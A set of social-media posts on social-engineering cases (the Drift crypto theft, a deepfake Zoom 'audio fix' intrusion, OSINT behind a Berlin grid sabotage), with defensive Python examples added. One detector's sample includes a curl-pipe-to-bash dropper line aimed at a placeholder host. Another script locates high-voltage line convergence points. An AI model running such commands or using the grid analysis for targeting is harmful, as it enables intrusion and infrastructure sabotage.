Posts by Christina Lekati

We know it happens, we talk about it in training, yet there is always a veil of doubt. Here is a rare public account of a #socialengineering op that started IN-PERSON & in a targeted way, ran for about 6 months, & cost Drift (a Solana-based DEX) $285 Million.
This is a truly sophisticated attack. 🧵

Here is how it unfolded:
🔹 Fall of 2025, a group of individuals (later linked to North Korea) started attending international crypto conferences, with a goal in mind. They were technically fluent, had fully constructed professional identities, & looked nothing like a North Korean.

🔹 This group, posing as employees of a quantitative trading firm, first approached specific Drift contributors at a major crypto conference face-to-face. They wanted to discuss integrating with the platform.

🔹 After the initial discussions, they moved their conversations to Telegram, where they spent months discussing legitimate trading strategies.

🔹 "What a pleasant coincidence running into you again!"
Over the next 6 months, the attackers deliberately sought out these same contributors at multiple global conferences. They wanted to continue building trust and credibility.

🔹 Dec. 2025 - Jan. 2026: To checkmate the game, the group onboarded an Ecosystem Vault on Drift. They engaged with the Drift contributors in working sessions, asked informed questions and eventually, they deposited over $1 Million of their own funds into the protocol.

🔹 (excerpt from Drift's Incident Update): "Integration conversations continued through February & March 2026. (...) By this point, the relationship was nearly half a year old...

...These were not strangers; they were people Drift contributors had worked with and met in person. (...) Links were shared for projects, tools, and apps they claimed to be building"

🔹 A relationship had been established, contributors didn't think twice when collaborating digitally. Drift presumes there may have been multiple technical attack vectors:

One contributor may have been compromised after cloning a code repository shared by the group as part of efforts to deploy a frontend for their vault. A second contributor was persuaded into downloading a wallet product via Apple's TestFlight to beta test the app.

On April 1, 2026, as the $285 million was drained, the attackers scrubbed their Telegram chats and vanished.
Incident Background Update from Drift:
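The first attack vector in the thread is a cloned "frontend" repository. The post does not say how the clone compromised the contributor, so the following is an added example (not from the post and not Drift's code): a pre-install audit that lists the places where a freshly cloned JavaScript repository can run code before anyone has read it. The hook locations it checks (npm lifecycle scripts and VS Code folder-open tasks) are an assumption about common tooling, and the sample repository it builds is constructed for the demo.

```python
"""Added example (not from the post and not Drift's code): audit a freshly cloned
JavaScript repository for hooks that execute on `npm install` or on opening the
folder. The hook locations are an assumption about common tooling, not a fact
about the Drift incident; the sample repo is constructed for the demo."""
import json
import os
import shutil
import tempfile

# Scripts npm runs on its own during `npm install` / `npm ci`.
NPM_LIFECYCLE = ("preinstall", "install", "postinstall", "prepare", "prepublish")


def _load_json(path):
    """Parse a JSON file; tasks.json is often JSONC, so a parse error means 'unreadable'."""
    try:
        with open(path, encoding="utf-8") as fh:
            return json.load(fh)
    except (OSError, ValueError):
        return None


def audit_repo(root):
    """Return (path, reason) pairs for every place the clone can auto-execute code."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        # Never descend into dependencies or git metadata.
        dirnames[:] = [d for d in dirnames if d not in ("node_modules", ".git")]
        if "package.json" in filenames:
            path = os.path.join(dirpath, "package.json")
            data = _load_json(path)
            scripts = (data.get("scripts") if isinstance(data, dict) else None) or {}
            for name in NPM_LIFECYCLE:
                if name in scripts:
                    findings.append((path, f"npm lifecycle script {name!r}: {scripts[name]}"))
        if os.path.basename(dirpath) == ".vscode" and "tasks.json" in filenames:
            path = os.path.join(dirpath, "tasks.json")
            data = _load_json(path)
            if data is None:
                findings.append((path, "tasks.json present but not parseable; review by hand"))
            else:
                tasks = (data.get("tasks") if isinstance(data, dict) else None) or []
                for task in tasks:
                    if (task.get("runOptions") or {}).get("runOn") == "folderOpen":
                        findings.append((path, f"VS Code task {task.get('label')!r} runs on folderOpen"))
    return findings


def build_sample_repo(root):
    """Write a constructed 'vault frontend' clone with two auto-run hooks (test fixture)."""
    os.makedirs(os.path.join(root, ".vscode"))
    with open(os.path.join(root, "package.json"), "w", encoding="utf-8") as fh:
        json.dump({"name": "vault-frontend",
                   "scripts": {"build": "vite build",
                               "postinstall": "node ./scripts/setup.js"}}, fh)
    with open(os.path.join(root, ".vscode", "tasks.json"), "w", encoding="utf-8") as fh:
        json.dump({"version": "2.0.0",
                   "tasks": [{"label": "bootstrap", "type": "shell",
                              "command": "sh ./scripts/bootstrap.sh",
                              "runOptions": {"runOn": "folderOpen"}}]}, fh)


def demo():
    """Build the fixture in a temp dir, audit it, clean up, and return the findings."""
    root = tempfile.mkdtemp(prefix="clone-audit-")
    try:
        build_sample_repo(root)
        return audit_repo(root)
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for path, reason in demo():
        print(f"{path}: {reason}")
```

Run it against a clone before `npm install` or before opening the folder in an editor; anything it lists deserves to be read in full, and `npm install --ignore-scripts` is the safe way to fetch dependencies in the meantime. The same idea extends to other ecosystems (`setup.py`, Makefiles, `.cargo/config.toml` runners), which this example does not cover.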
VERY excited that I'll be part of the @layer8conference.com this year delivering a keynote and a 2-day training class on Social Engineering!
Looking forward to meeting the Social Engineering & OSINT community in Boston. This will be fun! ✌🏻

Want a free ticket to Layer 8 Con? Sign up for "Social Engineering for Security Teams" by @christinalekati.bsky.social! A two-day immersive hands-on class that will teach all aspects of social engineering testing!
layer8conference.com www.zeffy.com/en-US/ticket...
If you think AI and deepfakes are THE name of the game in "sophisticated" social engineering attacks, think again. AI-gen deepfakes are often just one step (a final blow) in a larger social engineering kill-chain.
In this week's SE case, we see a layered intrusion.
cloud.google.com/blog/topics/...

What happened?
🔸 The threat actor initiates contact with a specific victim via Telegram, using a legit but compromised account of an executive, leveraging existing trust.
🔸 After building rapport through industry-specific conversation, they invite the victim to a call & send a Calendly link.

🔸 The Calendly link redirects to a spoofed Zoom meeting hosted on the threat actor's infrastructure: zoom[.]uswe05[.]us
This is the first obvious red flag that *could* have been spotted.

But, when a threat actor takes the time to build trust with a target first, the trust-transference mechanism kicks in. And then, the little red flags that follow tend to get overlooked. As they did.

🔸 The call begins. The victim sees the video of a CEO from another company.
Or, purportedly, their deepfake version.

🔸 And then hey, "the audio is broken!". If only that could quickly get fixed... there are only 20 minutes left in the call.
This is where the ClickFix-style social engineering begins. The threat actor directs the victim to run troubleshooting commands on their system to fix the issue.

🔸 Embedded within the string of commands is a single command that initiates a multi-stage infection chain, ultimately deploying 7 distinct malware families (described in the report).

"Proven play? Replay".
This is not a one-time hit. Mandiant has observed UNC1069 using these techniques to target both corporate entities and individuals within the cryptocurrency industry, as well as venture capital firms and their employees or executives. The list will expand.
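Two of the red flags in this thread can be checked mechanically: a "Zoom" link whose registrable domain is not zoom.us, and a pasted "audio fix" in which one command fetches and executes remote code. The block below is an added example, not from the post and not from Mandiant's report. The only indicator taken from the thread is the spoofed host zoom[.]uswe05[.]us; the command string is constructed for illustration and is not the actor's, and audio-fix.example is a placeholder host.

```python
"""Added example, not from the post or from Mandiant's report: two checks for the
red flags in this thread. The only indicator taken from the post is the spoofed
host zoom[.]uswe05[.]us; the 'audio fix' paste and audio-fix.example below are
constructed placeholders, not the actor's commands or infrastructure."""
import re
from urllib.parse import urlsplit

# Assumption: real Zoom meeting links live under zoom.us (add your vanity domain).
LEGIT_MEETING_DOMAINS = {"zoom.us"}


def refang(indicator):
    """Turn a defanged IOC like zoom[.]uswe05[.]us back into a usable string."""
    return indicator.replace("[.]", ".").replace("hxxp", "http")


def registrable_domain(host):
    """Last two labels of the host. Fine for .us/.com; use a public-suffix list for ccSLDs like .co.uk."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def meeting_link_is_legit(link):
    """True only if the link's registrable domain is an allowed meeting domain.
    'zoom' as a subdomain of somebody else's domain does not count."""
    url = refang(link)
    if "://" not in url:
        url = "https://" + url
    host = urlsplit(url).hostname or ""
    return registrable_domain(host) in LEGIT_MEETING_DOMAINS


# Things no audio troubleshooting step needs: fetch remote content and execute it.
FETCH_AND_RUN = [
    re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z|)sh\b"),
    re.compile(r"\bbase64\s+(-d|--decode|-D)\b.*\|\s*(ba|z|)sh\b"),
    re.compile(r"\beval\b.*\$\("),
    re.compile(r"\b(python3?|node|osascript|powershell)\b\s+-[ce]\s", re.I),
]


def split_commands(script):
    """Split a pasted 'run this' block into single commands; pipes stay inside a command."""
    return [c.strip() for c in re.split(r"\n|;|&&|\|\|", script) if c.strip()]


def suspicious_commands(script):
    """Return the commands in a pasted block that fetch and execute remote code."""
    return [c for c in split_commands(script) if any(p.search(c) for p in FETCH_AND_RUN)]


# Constructed 'fix your audio' paste: three plausible macOS commands and one dropper.
SAMPLE_FIX = """
sudo killall coreaudiod
system_profiler SPAudioDataType
curl -fsSL https://audio-fix.example/repair.sh | bash
defaults write com.apple.coreaudio "audio.level" -int 60
"""

if __name__ == "__main__":
    for link in ("https://us05web.zoom.us/j/1234567890", "zoom[.]uswe05[.]us"):
        print(link, "->", "ok" if meeting_link_is_legit(link) else "LOOKALIKE")
    for cmd in suspicious_commands(SAMPLE_FIX):
        print("fetch-and-run:", cmd)
```

The domain check is the important half: the spoof works because people read "zoom" at the start of the host and stop. The command scanner is a triage aid for help desks and for users who are asked to paste something; it is pattern-based, so an obfuscated paste can evade it, and the real control is a rule that nobody runs commands supplied by a meeting participant.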
Our "Fundamentals of Cyber Investigations and Human Intelligence" class is returning this spring to @blackhatevents.bsky.social Asia in Singapore!
For details & registrations:
blackhat.com/asia-26/trai...

Join @osintgeek.de and me on the 21st & 22nd of April for two days full of learning, hands-on exercises, real life case studies and the latest developments in #OSINT #SOCMINT and #HUMINT.

You will learn how to conduct an in-depth digital investigation on a subject, discover new leads, uncover and utilize all the evidence that is hiding in plain sight (and beyond) & conduct virtual HUMINT in an uncomplicated, step-by-step process.
P.S. There will be a class challenge, and a reward :)
Looking at the OpenInfraMap data in combination with satellite imagery, it is easy to see why this point of attack was chosen: all the 110 kilovolt high-voltage lines that supply southwest Berlin converge into a single cable bridge that is overground, and easily accessible.

The OpenInfraMap in combination with Google Maps is just one simple example of potential adversarial OSINT.

The Google Street View imagery provides some extra help in reviewing some of the physical security and the surrounding area in preparation for a better plan.

This incident has not been an isolated event.
There is more publicly available information, and more databases, that can be researched, found, and used in similar acts of sabotage (or worse, given the geopolitical state we are currently in).

It is scarily easy for saboteurs or other attackers to find vulnerabilities on critical infrastructure free & available online, and to focus on the locations/points where an attack could have the maximum impact.

What can be done? If you work on securing a critical infrastructure entity:
🔹 Run your own OSINT analysis to identify vulnerabilities in advance. Know your level of exposure.
Control what you can:
🔹 Where possible, ask platforms to add blur or remove certain imagery.

Aim for less detail in what can be visible, even through crowdsourced images.
🔹 Prioritize based on risk and take practical steps to implement better security measures on those vulnerable, identified spots before an adversary exploits them.
May the odds ever be in our favor ✨
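The analysis in this thread (several high-voltage lines converging on one accessible structure) is the same question a defender should ask of their own area first. The block below is an added example, not from the post and not OpenInfraMap's or OpenStreetMap's code: it finds nodes shared by multiple lines at or above a given voltage in an Overpass-API-style extract of `power=line` ways. The ways, node ids, names, voltages and node tags are constructed; for a real area the same shape of data comes from OpenStreetMap, which is what OpenInfraMap renders.

```python
"""Added example (not from the post, not OpenInfraMap's or OpenStreetMap's code):
find points where several high-voltage lines share one node, over a constructed
Overpass-style extract of power=line ways. All ids, names and tags are made up."""
from collections import defaultdict

# Constructed extract in the shape Overpass returns for `way[power=line]`.
SAMPLE_WAYS = [
    {"id": 1, "tags": {"power": "line", "voltage": "110000", "name": "Line A"}, "nodes": [10, 11, 20]},
    {"id": 2, "tags": {"power": "line", "voltage": "110000", "name": "Line B"}, "nodes": [12, 13, 20]},
    {"id": 3, "tags": {"power": "line", "voltage": "110000;380000", "name": "Line C"}, "nodes": [14, 20, 21]},
    {"id": 4, "tags": {"power": "line", "voltage": "380000", "name": "Line D"}, "nodes": [30, 31, 32]},
    {"id": 5, "tags": {"power": "minor_line", "voltage": "10000"}, "nodes": [20, 40]},
]
# Constructed node tags for the shared crossing (in OSM a bridge is often its own feature).
SAMPLE_NODE_TAGS = {20: {"bridge": "yes", "location": "overground"}}


def parse_voltages(tag):
    """'110000;380000' -> {110000, 380000}; missing or junk values -> empty set."""
    volts = set()
    for part in (tag or "").split(";"):
        try:
            volts.add(int(float(part.strip())))
        except ValueError:
            continue
    return volts


def convergence_points(ways, min_voltage=110_000, min_lines=2):
    """Map node id -> sorted way ids for nodes shared by >= min_lines distinct lines
    rated at or above min_voltage. Lower-voltage and minor lines are ignored."""
    by_node = defaultdict(set)
    for way in ways:
        tags = way.get("tags", {})
        if tags.get("power") != "line":
            continue
        if not any(v >= min_voltage for v in parse_voltages(tags.get("voltage"))):
            continue
        for node in way.get("nodes", []):
            by_node[node].add(way["id"])
    return {n: sorted(ids) for n, ids in by_node.items() if len(ids) >= min_lines}


def describe(points, ways, node_tags):
    """Human-readable lines: which named circuits meet at each point, plus the node's tags."""
    names = {w["id"]: w.get("tags", {}).get("name", f"way {w['id']}") for w in ways}
    out = []
    for node, way_ids in sorted(points.items(), key=lambda kv: -len(kv[1])):
        tags = ", ".join(f"{k}={v}" for k, v in sorted(node_tags.get(node, {}).items())) or "no tags"
        out.append(f"node {node}: {len(way_ids)} lines ({', '.join(names[i] for i in way_ids)}); {tags}")
    return out


if __name__ == "__main__":
    for line in describe(convergence_points(SAMPLE_WAYS), SAMPLE_WAYS, SAMPLE_NODE_TAGS):
        print(line)
```

Two caveats when running this on real OSM data: every line legitimately converges at a substation, so exclude nodes inside `power=substation` areas (or the end nodes of each way) before reading the result as a single point of failure; and one circuit is frequently split into several OSM ways, so merge ways by `name` or `ref` first or the count of "distinct lines" will be inflated.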